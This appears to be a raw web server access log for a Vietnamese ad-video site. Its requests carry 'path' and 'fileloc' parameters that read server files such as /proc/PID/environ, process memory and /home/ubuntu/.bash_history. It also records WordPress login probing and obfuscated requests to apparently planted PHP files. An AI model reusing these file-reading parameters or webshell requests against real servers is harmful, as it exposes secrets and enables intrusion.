34.236.135.14 - - [10/Nov/2025:00:54:27 +0000] "GET /our-works/tvc-calci/?path=//sys/module/psmouse/holders HTTP/1.1" 200 2678 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:00:54:27 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/sessionid&path=//proc/659 HTTP/1.1" 200 2616 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:54:28 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/cmdline&path=//proc/661 HTTP/1.1" 200 2622 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
34.236.135.14 - - [10/Nov/2025:00:54:28 +0000] "GET /our-works/tvc-relax-gaba/?path=//lib/exim4/local_scan HTTP/1.1" 200 2672 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:00:54:29 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/pagemap&path=//proc/657 HTTP/1.1" 200 2608 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
107.189.11.185 - - [10/Nov/2025:00:54:29 +0000] "GET /wp-login.php HTTP/1.1" 200 4543 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.90 Safari/537.36 Edg/118.0.2088.76"
51.77.43.178 - - [10/Nov/2025:00:54:30 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/cpuset&path=//proc/661 HTTP/1.1" 200 2608 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:54:30 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/sessionid&path=//proc/657 HTTP/1.1" 200 2617 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:54:31 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/arch_status&path=//proc/664 HTTP/1.1" 200 2610 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:00:54:32 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory4/node0/cpu0/driver/cpu0 HTTP/1.1" 200 3443 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:54:33 +0000] "GET /82yia28076.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
18.214.124.6 - - [10/Nov/2025:00:54:33 +0000] "GET /our-works/tvc-kimino/?path=//lib/python3.8/pydoc_data/__pycache__ HTTP/1.1" 200 3029 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:00:54:34 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/sessionid&path=//proc/661 HTTP/1.1" 200 2616 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:54:34 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/io&path=//proc/659 HTTP/1.1" 200 2603 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:54:35 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/patch_state&path=//proc/657 HTTP/1.1" 200 2609 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:54:35 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/environ&path=//proc/661 HTTP/1.1" 200 2608 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:54:36 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/statm&path=//proc/661 HTTP/1.1" 200 2625 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:00:54:36 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory4/node0/cpu0/node0 HTTP/1.1" 200 3943 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.84.147.79 - - [10/Nov/2025:00:54:37 +0000] "GET /our-works/tvc-lapatie-2/?fileloc=//lib/python3/dist-packages/jsonpatch.py&path=//lib/python3/dist-packages HTTP/1.1" 200 8716 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:00:54:37 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/setgroups&path=//proc/659 HTTP/1.1" 200 2611 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:00:54:38 +0000] "GET /42ophjw26728.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:54:39 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/comm&path=//proc/661 HTTP/1.1" 200 2611 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:54:39 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/autogroup&path=//proc/664 HTTP/1.1" 200 2619 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
54.163.169.168 - - [10/Nov/2025:00:54:40 +0000] "GET /our-works/phu-long-corporate-video/?fileloc=//bin/sh&path=//bin HTTP/1.1" 200 2592 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:00:54:41 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/oom_adj&path=//proc/661 HTTP/1.1" 200 2610 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:00:54:41 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory6/node0/cpu1/subsystem HTTP/1.1" 200 3206 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:54:41 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/stat&path=//proc/657 HTTP/1.1" 200 2733 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:54:42 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/gid_map&path=//proc/661 HTTP/1.1" 200 2623 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:00:54:43 +0000] "GET /31hgd26535.html?path=/var/www/lamphim/data/email HTTP/1.1" 200 2691 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:54:43 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fthread-self%2Froot%2Fusr%2Fshare%2Fzoneinfo%2FEurope HTTP/1.1" 200 5254 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.77.43.178 - - [10/Nov/2025:00:54:44 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/setgroups&path=//proc/661 HTTP/1.1" 200 2612 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
184.72.95.195 - - [10/Nov/2025:00:54:44 +0000] "GET /our-works/tvc-bia-hello/?path=//lib/open-vm-tools/plugins/vmsvc HTTP/1.1" 200 3258 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:00:54:45 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/setgroups&path=//proc/657 HTTP/1.1" 200 2612 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:54:45 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/limits&path=//proc/659 HTTP/1.1" 200 2867 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:54:46 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/personality&path=//proc/657 HTTP/1.1" 200 2610 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.79.248.20 - - [10/Nov/2025:00:54:47 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323733393536372p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323733353936372q3630346431373733666565323561636437386233633335666239316339386132222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
74.7.227.189 - - [10/Nov/2025:00:54:47 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory2/node0/cpu0/driver/cpu1 HTTP/1.1" 200 3489 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:54:47 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/status&path=//proc/661 HTTP/1.1" 200 3069 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:00:54:48 +0000] "GET /14mhhd16740.html?path=/var/www/lamphim/data/email HTTP/1.1" 200 2691 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:54:48 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/auxv&path=//proc/664 HTTP/1.1" 200 2607 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
44.223.115.10 - - [10/Nov/2025:00:54:48 +0000] "GET /our-works/tvc-jokky/?path=//proc/22/net/netfilter HTTP/1.1" 200 2947 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:00:54:49 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/coredump_filter&path=//proc/661 HTTP/1.1" 200 2618 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:54:49 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/io&path=//proc/661 HTTP/1.1" 200 2604 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:54:49 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/smaps&path=//proc/659 HTTP/1.1" 200 2605 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:54:49 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/smaps&path=//proc/661 HTTP/1.1" 200 2606 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:54:50 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/statm&path=//proc/657 HTTP/1.1" 200 2627 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:00:54:50 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory0/node0/cpu0/node0 HTTP/1.1" 200 3948 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:54:50 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/oom_score&path=//proc/661 HTTP/1.1" 200 2612 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:00:54:51 +0000] "GET /81relo44877.html?path=/var/www/lamphim/data/email HTTP/1.1" 200 2691 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
98.82.107.102 - - [10/Nov/2025:00:54:52 +0000] "GET /our-works/tvc-bia-hello/?path=//lib/open-vm-tools/plugins/vmsvc HTTP/1.1" 200 3258 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:00:54:52 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/loginuid&path=//proc/659 HTTP/1.1" 200 2617 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:00:54:52 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory6/node0/cpu0/node0/hugepages HTTP/1.1" 200 3061 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:54:52 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/limits&path=//proc/661 HTTP/1.1" 200 2870 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:54:53 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/cgroup&path=//proc/664 HTTP/1.1" 200 2732 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:00:54:53 +0000] "GET /199dowi1105.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.198.33.233 - - [10/Nov/2025:00:54:54 +0000] "GET /our-works/tvc-calci/?path=//usr/share/doc/initramfs-tools-core HTTP/1.1" 200 3134 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:00:54:55 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/projid_map&path=//proc/657 HTTP/1.1" 200 2625 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:54:55 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/smaps_rollup&path=//proc/661 HTTP/1.1" 200 2611 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:54:56 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/syscall&path=//proc/661 HTTP/1.1" 200 2608 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:00:54:56 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory0/node0/cpu0/firmware_node/power HTTP/1.1" 200 3365 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:54:57 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/smaps_rollup&path=//proc/659 HTTP/1.1" 200 2611 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:00:54:57 +0000] "GET /14mhhd16740.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:54:58 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/cpuset&path=//proc/661 HTTP/1.1" 200 2608 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:55:02 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/maps&path=//proc/659 HTTP/1.1" 200 2604 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:55:02 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/loginuid&path=//proc/661 HTTP/1.1" 200 2617 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:55:03 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/status&path=//proc/657 HTTP/1.1" 200 3076 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:55:03 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/clear_refs&path=//proc/664 HTTP/1.1" 200 2611 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:55:04 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/oom_score_adj&path=//proc/661 HTTP/1.1" 200 2614 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
100.29.128.75 - - [10/Nov/2025:00:55:04 +0000] "GET /our-works/tvc-bia-hello/?path=//sys/kernel/slab/kmalloc-128 HTTP/1.1" 200 4027 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:00:55:05 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory6/node0/cpu1/cache/index0 HTTP/1.1" 200 3449 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:55:05 +0000] "GET /31hgd26535.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 500 624 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:55:07 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/stack&path=//proc/661 HTTP/1.1" 200 2606 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:55:07 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/sched&path=//proc/657 HTTP/1.1" 200 3029 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:55:08 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/smaps&path=//proc/657 HTTP/1.1" 200 2606 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
34.195.60.66 - - [10/Nov/2025:00:55:08 +0000] "GET /our-works/tvc-bia-hello/?path=//sys/kernel/slab/kmalloc-128 HTTP/1.1" 200 4027 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
107.189.5.134 - - [10/Nov/2025:00:55:10 +0000] "GET /wp-login.php HTTP/1.1" 200 4544 "https://duckduckgo.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.117 Safari/537.36"
51.79.248.20 - - [10/Nov/2025:00:55:11 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323733393539312p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323733353939312q3833356633343461313532363736356237623666653537646231616536383962222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
51.77.43.178 - - [10/Nov/2025:00:55:11 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/stack&path=//proc/659 HTTP/1.1" 200 2606 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:55:11 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/timers&path=//proc/661 HTTP/1.1" 200 2606 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:55:11 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/maps&path=//proc/661 HTTP/1.1" 200 2605 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
3.219.80.71 - - [10/Nov/2025:00:55:11 +0000] "GET /our-works/phim-viral-ila/?fileloc=//home/ubuntu/.bash_history&path=//home/ubuntu HTTP/1.1" 200 2611 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:00:55:11 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory6/node0/cpu1/node0/power HTTP/1.1" 200 3366 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:55:12 +0000] "GET /82yia28076.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:55:12 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/cmdline&path=//proc/664 HTTP/1.1" 200 2622 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:55:12 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/environ&path=//proc/661 HTTP/1.1" 200 2608 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
54.166.126.132 - - [10/Nov/2025:00:55:12 +0000] "GET /our-works/tv-commercial/tvc-thach-long-hai/?path=//sys/kernel/slab/cred_jar HTTP/1.1" 200 4025 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:00:55:12 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/stat&path=//proc/661 HTTP/1.1" 200 2710 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:55:13 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/657/schedstat&path=//proc/657 HTTP/1.1" 200 2630 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
54.166.126.132 - - [10/Nov/2025:00:55:13 +0000] "GET /video/san-xuat-phim-quang-cao/?path=//var/log/mysql HTTP/1.1" 200 2666 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:00:55:13 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory6/node0/cpu1/driver/cpu0/power HTTP/1.1" 200 3418 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
69.197.179.242 - - [10/Nov/2025:00:55:13 +0000] "GET /wp-includes/addc3d4c/edit.php?id=336228 HTTP/1.1" 499 0 "https://lamphimquangcao.net/wp-includes/addc3d4c/edit.php?id=336228" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
74.7.227.51 - - [10/Nov/2025:00:55:14 +0000] "GET /99xavw12533.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:00:55:14 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/pagemap&path=//proc/661 HTTP/1.1" 200 2607 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:55:14 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/timerslack_ns&path=//proc/661 HTTP/1.1" 200 2611 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:55:14 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/mem&path=//proc/661 HTTP/1.1" 200 2604 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:00:55:15 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/659/mem&path=//proc/659 HTTP/1.1" 200 2604 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
